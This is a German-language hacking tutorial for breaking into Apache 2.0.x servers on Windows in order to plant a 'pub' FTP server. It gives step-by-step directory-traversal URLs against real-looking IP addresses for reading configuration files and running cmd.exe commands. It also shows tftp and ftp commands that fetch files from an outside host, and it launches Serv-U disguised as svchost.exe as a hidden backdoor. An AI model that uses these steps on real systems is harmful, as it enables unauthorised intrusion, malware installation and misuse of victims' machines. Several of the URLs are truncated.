Apache Hacken TuT von Serg
--------------------------------------------------------------------------------
-=Apache PubHacking Tutorial=-
(Win32 2.0.0-2.0.39)
In der Art ist es wie IIS aber nur in der Art. Was man braucht sind mal wieder DOS Kenntnisse und ServU.
1)
Sucht euch aus dem Scanns einen geeigneten aus ( z.B. http://130.91.51.201 :80 - http -- open, running Apache 2.0.35 (Win32) - Possible Unsafe )
2)
Da geht ihr auf den link http://ip/error/%5c%2e%2e%5clogs%5cinstall.log sprich http://130.91.51.201/error/%5c%2e%2e%5clogs%5cinstall.log
Hier wird euch das Verzeichnis vom Apache gezeigt, msst ihr euch merken ist fr das sptere zusammen setzten des Unicodes wichtig!
-jetzt auf http://ip/error/%5c%2e%2e%5cconf%5chttpd.conf sprich http://130.91.51.201/error/%5c%2e%2e%5cconf%5chttpd.conf
Hier seht ihr die Config in ihr msst ihr nach dem Eintrag ScriptAlias /cgi-bin/ "C:/Program Files/Apache Group/Apache2/cgi-bin/" suchen. Wieder merken.
je nach dem wie viel /.. / er machen muss fr den jeweiligen Code msst ihr den Unicode anpassen. ( ein /.. / = %5c%2e%2e%5c )
3)
Jetzt zum auslesen einiger Verzeichnis. Da bei Apachen der Befehl DIR nich anzeigbar ist mssen wir ihn halt einfach in eine Datei schreiben lassen.
http://195.8.15.42/cgi-bin/%5c%2e%2e%5c%...d.exe?/c+dir+c:>>s:\dir.txt
und dann ber Error zeigen lassen
http://195.7.13.42/error/%5c%2e%2e%5c%2e...2e%2e%5cdir.txt
Jetzt sieht man das Verzeichnis c:\ wie damals beim IIS, leider muss man das fr jedes einzelne Verzeichnis wiederholen.
4)
In Sachen Apache klappen viele Befehle nicht, deswegen ist es etwas kniffelig die Files hochzuladen. Echo gibt es dabei nicht.
Also muss die ftpscr.txt die wir sonst fr das IIS Echo Hacken benutzen mit TfTp hochgeladen werden! ( suxx )
tfpt -i ip get file ziel kennt ihr bestimmt noch von frher...
http://130.91.51.201/cgi-bin/%5c%2e%2e%5...log.txt+c:\temp
Dadurch wie die log.txt in das Verzeichnis c:\winnt\system32\ geladen, diese ist nun fr den ftp Clienten ladbar ( ftp -s:c:\test.txt )
http://130.91.51.201/cgi-bin/%5c%2e%2e%5...ystem32\log.txt
Wenn alle geklappt hatt sind deine Files jetzt da wo sie in der TXT stehen.
5)
Gestartet wird mit "call" das geht wie unten beschrieben.
c+call+c:\temp\svchost.exe+/h+/u+c:\iamevent.dll
http://129.241.2.190/cgi-bin/%5c%2e%2e%5...c:\iamevent.dll
Somit sollte Serv-U Gestartet sein, wenn nicht ist er schon gehackt den Systemrechte habt ihr mit Apache sowieso!
|
 讓我們程式搜尋結果更加完美 如果您覺得該文件有幫助到您,煩請按下我如果您覺得該文件是一個一無是處的文件,也煩請按下我 |
|
該文件您看起來是亂碼嗎?您可以切換編碼方式試試看!ISO-8859-1 | latin1 | euc-kr | euc-jp | CP936 | CP950 | UTF-8 | GB2312 | BIG5 |
|